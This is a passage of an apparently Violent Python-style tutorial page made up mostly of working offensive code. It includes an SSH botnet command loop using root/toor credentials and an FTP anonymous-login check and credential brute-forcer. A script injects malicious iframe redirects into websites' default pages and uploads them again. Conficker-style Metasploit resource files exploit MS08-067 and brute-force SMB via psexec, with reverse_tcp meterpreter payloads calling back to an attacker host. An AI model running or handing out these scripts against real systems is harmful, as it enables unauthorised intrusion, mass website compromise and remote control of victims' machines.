    <span class="k">def</span> <span class="nf">send_command</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">prompt</span><span class="p">()</span>
        <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">before</span>

<span class="k">def</span> <span class="nf">bot_net_command</span><span class="p">(</span><span class="n">command</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">client</span> <span class="ow">in</span> <span class="n">bot_net</span><span class="p">:</span>
        <span class="n">output</span> <span class="o">=</span> <span class="n">client</span><span class="p">.</span><span class="n">send_command</span><span class="p">(</span><span class="n">command</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] Output from {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">client</span><span class="p">.</span><span class="n">host</span><span class="p">))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">output</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">add_client</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span>
    <span class="n">client</span> <span class="o">=</span> <span class="n">Client</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
    <span class="n">bot_net</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">client</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">add_client</span><span class="p">(</span><span class="s">"10.10.10.110"</span><span class="p">,</span> <span class="s">"root"</span><span class="p">,</span> <span class="s">"toor"</span><span class="p">)</span>
    <span class="n">add_client</span><span class="p">(</span><span class="s">"10.10.10.120"</span><span class="p">,</span> <span class="s">"root"</span><span class="p">,</span> <span class="s">"toor"</span><span class="p">)</span>
    <span class="n">add_client</span><span class="p">(</span><span class="s">"10.10.10.130"</span><span class="p">,</span> <span class="s">"root"</span><span class="p">,</span> <span class="s">"toor"</span><span class="p">)</span>
    <span class="n">bot_net_command</span><span class="p">(</span><span class="s">"uname -v"</span><span class="p">)</span>
    <span class="n">bot_net_command</span><span class="p">(</span><span class="s">"cat /etc/issue"</span><span class="p">)</span>
</code></pre></div></div>
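<h2 id="利用-ftp-与-web-批量抓-肉机">Mass Compromise via FTP and the Web</h2>

<h3 id="用-python-构建匿名-ftp-扫描器">Building an Anonymous FTP Scanner with Python</h3>

<p>Python's ftplib library can be used to write a small script that determines whether a server allows anonymous login.</p>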

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">ftplib</span>
<span class="k">def</span> <span class="nf">anon_login</span><span class="p">(</span><span class="n">hostname</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">ftp</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">(</span><span class="n">hostname</span><span class="p">)</span>
        <span class="n">ftp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="s">"anonymous"</span><span class="p">,</span> <span class="s">"me@your.com"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} FTP Anonymous Logon Succeeded."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span>
        <span class="n">ftp</span><span class="p">.</span><span class="n">quit</span><span class="p">()</span>
        <span class="k">return</span> <span class="bp">True</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] {} FTP Anonymous Logon Failed."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span>
        <span class="k">return</span> <span class="bp">False</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">host</span> <span class="o">=</span> <span class="s">"192.168.158.161"</span>
    <span class="n">anon_login</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
</code></pre></div></div>

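<h3 id="使用-ftplib-暴力破解-ftp-用户口令">Brute-Forcing FTP User Credentials with ftplib</h3>

<p>FTP client programs such as <code class="language-plaintext highlighter-rouge">FileZilla</code> often store passwords in plaintext in their configuration files.</p>

<p>To verify a credential pair, replace the arguments to <code class="language-plaintext highlighter-rouge">ftp.login()</code> above with the corresponding username and password.</p>

<h3 id="在-ftp-服务器上搜索网页">Searching for Web Pages on the FTP Server</h3>

<p>Use the <code class="language-plaintext highlighter-rouge">nlst</code> method, which returns the names of all files in a directory.</p>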

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">dir_list</span> <span class="o">=</span> <span class="n">ftp</span><span class="p">.</span><span class="n">nlst</span><span class="p">()</span>
</code></pre></div></div>
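
<p>Since <code class="language-plaintext highlighter-rouge">nlst()</code> returns a plain list of names, picking out the web pages is an ordinary string filter. A minimal sketch, assuming a hypothetical helper <code class="language-plaintext highlighter-rouge">find_web_pages</code> and a made-up <code class="language-plaintext highlighter-rouge">listing</code> standing in for a real directory listing; the extension set is also an assumption:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Extensions treated as web pages (an assumed set, adjust as needed).
WEB_EXTENSIONS = (".php", ".htm", ".html", ".asp")


def find_web_pages(names):
    """Return the entries whose extension looks like a web page."""
    return [name for name in names if name.lower().endswith(WEB_EXTENSIONS)]


# Made-up listing standing in for the result of ftp.nlst().
listing = ["index.html", "notes.txt", "Default.ASP", "upload.php", "logo.png"]
print(find_web_pages(listing))  # ['index.html', 'Default.ASP', 'upload.php']
</code></pre></div></div>

<p>Matching on the end of the name, rather than testing whether the extension appears anywhere in it, avoids false hits such as <code class="language-plaintext highlighter-rouge">site.php.bak</code>.</p>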

<h3 id="在网页中加入恶意注入代码">Injecting Malicious Code into Web Pages</h3>

<p>Generate it directly with the <code class="language-plaintext highlighter-rouge">metasploit</code> framework:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfcli exploit/windows/browser/ms10_002_aurora
</code></pre></div></div>

<p>The upload command:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ftp</span><span class="p">.</span><span class="n">storlines</span><span class="p">(</span><span class="s">"STOR {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">),</span> <span class="nb">open</span><span class="p">(</span><span class="s">"{}.tmp"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">)))</span>
</code></pre></div></div>

<h3 id="完整的代码-demo">Complete Demo Code</h3>

<p>It is largely redundant, but here is the whole workflow typed out in one place.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">ftplib</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">time</span>

<span class="k">def</span> <span class="nf">anon_login</span><span class="p">(</span><span class="n">hostname</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">ftp</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">(</span><span class="n">hostname</span><span class="p">)</span>
        <span class="n">ftp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="s">"anonymous"</span><span class="p">,</span> <span class="s">"me@your.com"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} FTP Anonymous Logon Succeeded."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span>
        <span class="n">ftp</span><span class="p">.</span><span class="n">quit</span><span class="p">()</span>
        <span class="k">return</span> <span class="bp">True</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] {} FTP Anonymous Logon Failed."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span>
        <span class="k">return</span> <span class="bp">False</span>

<span class="k">def</span> <span class="nf">brute_login</span><span class="p">(</span><span class="n">hostname</span><span class="p">,</span> <span class="n">password_file</span><span class="p">):</span>
    <span class="n">pf</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">password_file</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">pf</span><span class="p">.</span><span class="n">readlines</span><span class="p">():</span>
        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">user_name</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
        <span class="n">password</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)[</span><span class="mi">1</span><span class="p">].</span><span class="n">strip</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Trying: {}/{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user_name</span><span class="p">,</span> <span class="n">password</span><span class="p">))</span>

        <span class="k">try</span><span class="p">:</span>
            <span class="n">ftp</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">(</span><span class="n">hostname</span><span class="p">)</span>
            <span class="n">ftp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">user_name</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} FTP Logon Succeeded: {}/{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">hostname</span><span class="p">,</span> <span class="n">user_name</span><span class="p">,</span> <span class="n">password</span><span class="p">))</span>
            <span class="n">ftp</span><span class="p">.</span><span class="n">quit</span><span class="p">()</span>
            <span class="k">return</span> <span class="n">user_name</span><span class="p">,</span> <span class="n">password</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">pass</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[-] Could not brute force FTP credentials."</span><span class="p">)</span>
    <span class="k">return</span> <span class="bp">None</span><span class="p">,</span> <span class="bp">None</span>

<span class="k">def</span> <span class="nf">return_default</span><span class="p">(</span><span class="n">ftp</span><span class="p">):</span>
    <span class="n">dir_list</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">dir_list</span> <span class="o">=</span> <span class="n">ftp</span><span class="p">.</span><span class="n">nlst</span><span class="p">()</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Could not list directory contents."</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Skipping To Next Target."</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">dir_list</span>

    <span class="n">ret_list</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">file_name</span> <span class="ow">in</span> <span class="n">dir_list</span><span class="p">:</span>
        <span class="n">fn</span> <span class="o">=</span> <span class="n">file_name</span><span class="p">.</span><span class="n">lower</span><span class="p">()</span>
        <span class="k">if</span> <span class="s">".php"</span> <span class="ow">in</span> <span class="n">fn</span> <span class="ow">or</span> <span class="s">".htm"</span> <span class="ow">in</span> <span class="n">fn</span> <span class="ow">or</span> <span class="s">".asp"</span> <span class="ow">in</span> <span class="n">fn</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found default page: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">file_name</span><span class="p">))</span>
        <span class="n">ret_list</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">file_name</span><span class="p">)</span>

    <span class="k">return</span> <span class="n">ret_list</span>

<span class="k">def</span> <span class="nf">inject_page</span><span class="p">(</span><span class="n">ftp</span><span class="p">,</span> <span class="n">page</span><span class="p">,</span> <span class="n">redirect</span><span class="p">):</span>
    <span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"{}.tmp"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">),</span> <span class="s">"w"</span><span class="p">)</span>
    <span class="n">ftp</span><span class="p">.</span><span class="n">retrlines</span><span class="p">(</span><span class="s">"RETR {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">),</span> <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Downloaded Page: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">))</span>
    <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">redirect</span><span class="p">)</span>
    <span class="n">f</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>

    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Injected Malicious IFrame on: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">))</span>
    <span class="n">ftp</span><span class="p">.</span><span class="n">storlines</span><span class="p">(</span><span class="s">"STOR {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">),</span> <span class="nb">open</span><span class="p">(</span><span class="s">"{}.tmp"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">)))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Uploaded Injected Page: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">attack</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">redirect</span><span class="p">):</span>
    <span class="n">ftp</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">(</span><span class="n">target_host</span><span class="p">)</span>
    <span class="n">ftp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
    <span class="n">def_pages</span> <span class="o">=</span> <span class="n">return_default</span><span class="p">(</span><span class="n">ftp</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">def_page</span> <span class="ow">in</span> <span class="n">def_pages</span><span class="p">:</span>
        <span class="n">inject_page</span><span class="p">(</span><span class="n">ftp</span><span class="p">,</span> <span class="n">def_page</span><span class="p">,</span> <span class="n">redirect</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -H &lt;target host[s]&gt; -r &lt;redirect page&gt; [-f &lt;user_pass file&gt;]"</span><span class="p">)</span>

    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-H"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_hosts"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target host"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-f"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"password_file"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify user/password file"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-r"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"redirect"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify a redirection page"</span><span class="p">)</span>

    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">target_hosts</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">options</span><span class="p">.</span><span class="n">target_hosts</span><span class="p">).</span><span class="n">split</span><span class="p">(</span><span class="s">", "</span><span class="p">)</span>
    <span class="n">password_file</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">password_file</span>
    <span class="n">redirect</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">redirect</span>

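    <span class="c1"># str(None) is "None", so test the raw option rather than the split list</span>
    <span class="k">if</span> <span class="n">options</span><span class="p">.</span><span class="n">target_hosts</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">redirect</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>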
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">target_host</span> <span class="ow">in</span> <span class="n">target_hosts</span><span class="p">:</span>
        <span class="n">username</span><span class="p">,</span> <span class="n">password</span> <span class="o">=</span> <span class="bp">None</span><span class="p">,</span> <span class="bp">None</span>
        <span class="k">if</span> <span class="n">anon_login</span><span class="p">(</span><span class="n">target_host</span><span class="p">):</span>
            <span class="n">username</span><span class="p">,</span> <span class="n">password</span> <span class="o">=</span> <span class="s">"test"</span><span class="p">,</span> <span class="s">"test"</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Using Anonymous Creds to attack"</span><span class="p">)</span>
            <span class="n">attack</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">redirect</span><span class="p">)</span>
        <span class="k">elif</span> <span class="n">password_file</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
            <span class="n">username</span><span class="p">,</span> <span class="n">password</span> <span class="o">=</span> <span class="n">brute_login</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">password_file</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">password</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[+] Using Creds: {}/{} to attack"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">))</span>
                <span class="n">attack</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">redirect</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>
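<h2 id="conficker为什么努力做就够了">Conficker: Why Trying Hard Is Always Good Enough</h2>

<p>The Conficker worm (also known as W32.Downadup) used two different attack vectors in its basic infection routine. It first exploited a zero-day vulnerability in the Windows Server service: through this stack-based buffer overflow, the worm could execute shellcode on the infected host and download a copy of itself. When that attack failed, Conficker fell back to brute-forcing the password of the default administrative network share (<code class="language-plaintext highlighter-rouge">ADMIN$</code>) to gain access to the host.</p>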

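<h3 id="使用-metasploit-攻击-windows-smb-服务">Attacking the Windows SMB Service with Metasploit</h3>

<p>Although an attacker can drive Metasploit interactively, Metasploit can also read a batch resource script (an rc file) to carry out an attack. It executes the commands in that file in order.</p>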

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Contents of conficker.rc</span>
use exploit/windows/smb/ms08_067_netapi
<span class="nb">set </span>RHOST 192.168.1.37
<span class="nb">set </span>PAYLOAD windows/meterpreter/reverse_tcp
<span class="nb">set </span>LHOST 192.168.77.77
<span class="nb">set </span>LPORT 7777
exploit <span class="nt">-j</span> <span class="nt">-z</span>

<span class="c"># Load the resource script, then interact with the session it opens</span>
msfconsole <span class="nt">-r</span> conficker.rc
<span class="o">&gt;</span> sessions <span class="nt">-i</span> 1
<span class="o">&gt;</span> execute <span class="nt">-i</span> <span class="nt">-f</span> cmd.exe
</code></pre></div></div>

<h3 id="编写-python-脚本与-metasploit-交互">Writing a Python Script to Interact with Metasploit</h3>

<p>The first step is to scan the subnet for every host with TCP port 445 open. TCP 445 is the default port for the SMB protocol.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">nmap</span>
<span class="k">def</span> <span class="nf">find_target</span><span class="p">(</span><span class="n">sub_net</span><span class="p">):</span>
    <span class="n">nm_scan</span> <span class="o">=</span> <span class="n">nmap</span><span class="p">.</span><span class="n">PortScanner</span><span class="p">()</span>
    <span class="n">nm_scan</span><span class="p">.</span><span class="n">scan</span><span class="p">(</span><span class="n">sub_net</span><span class="p">,</span> <span class="s">"445"</span><span class="p">)</span>
    <span class="n">target_hosts</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">host</span> <span class="ow">in</span> <span class="n">nm_scan</span><span class="p">.</span><span class="n">all_hosts</span><span class="p">():</span>
        <span class="k">if</span> <span class="n">nm_scan</span><span class="p">[</span><span class="n">host</span><span class="p">].</span><span class="n">has_tcp</span><span class="p">(</span><span class="mi">445</span><span class="p">):</span>
            <span class="n">state</span> <span class="o">=</span> <span class="n">nm_scan</span><span class="p">[</span><span class="n">host</span><span class="p">][</span><span class="s">"tcp"</span><span class="p">][</span><span class="mi">445</span><span class="p">][</span><span class="s">"state"</span><span class="p">]</span>
            <span class="k">if</span> <span class="n">state</span> <span class="o">==</span> <span class="s">"open"</span><span class="p">:</span>
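                <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found Target Host: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">host</span><span class="p">))</span>
                <span class="n">target_hosts</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">target_hosts</span>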
</code></pre></div></div>

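<p>Next comes a listener, also called a command-and-control channel, used to interact remotely with the target host.</p>

<p>Metasploit provides an advanced dynamic payload called Meterpreter. When a Meterpreter process connects back to the attacker's machine and waits for further commands, a Metasploit module named <code class="language-plaintext highlighter-rouge">multi/handler</code> is used to issue them. Each instruction then has to be written into a Metasploit rc script.</p>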

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">setup_handler</span><span class="p">(</span><span class="n">config_file</span><span class="p">,</span> <span class="n">lhost</span><span class="p">,</span> <span class="n">lport</span><span class="p">):</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"use exploit/multi/handler</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set PAYLOAD windows/meterpreter/reverse_tcp</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LPORT {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lport</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lhost</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"exploit -j -z</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"setg DisablePayloadHandler 1</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

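<p>Note the <code class="language-plaintext highlighter-rouge">exploit -j -z</code> instruction the script writes: <code class="language-plaintext highlighter-rouge">-j</code> runs the exploit in the context of a job (in the background), and <code class="language-plaintext highlighter-rouge">-z</code> keeps Metasploit from interacting with the session as soon as it opens. The closing <code class="language-plaintext highlighter-rouge">setg DisablePayloadHandler 1</code> sets a global option so that later modules do not start their own handler, because one is already listening.</p>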

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">conficker_exploit</span><span class="p">(</span><span class="n">config_file</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">lhost</span><span class="p">,</span> <span class="n">lport</span><span class="p">):</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"use exploit/windows/smb/ms08_067_netapi</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set RHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_host</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set PAYLOAD windows/meterpreter/reverse_tcp</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LPORT {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lport</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lhost</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"exploit -j -z</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

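<h3 id="暴力破解口令远程执行一个进程">Brute-Forcing Credentials and Remotely Executing a Process</h3>

<p>The script brute-forces the SMB username and password to obtain the access needed to execute a process remotely on the target host (psexec).</p>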

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">smb_brute</span><span class="p">(</span><span class="n">config_file</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">passwd_file</span><span class="p">,</span> <span class="n">lhost</span><span class="p">,</span> <span class="n">lport</span><span class="p">):</span>
    <span class="n">username</span> <span class="o">=</span> <span class="s">"Administrator"</span>
    <span class="n">pf</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">passwd_file</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">password</span> <span class="ow">in</span> <span class="n">pf</span><span class="p">.</span><span class="n">readlines</span><span class="p">():</span>
        <span class="n">password</span> <span class="o">=</span> <span class="n">password</span><span class="p">.</span><span class="n">strip</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">)</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"use exploit/windows/smb/psexec</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set SMBUser {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">username</span><span class="p">))</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set SMBPass {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
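        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set RHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_host</span><span class="p">))</span>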
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set PAYLOAD windows/meterpreter/reverse_tcp</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LPORT {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lport</span><span class="p">))</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lhost</span><span class="p">))</span>
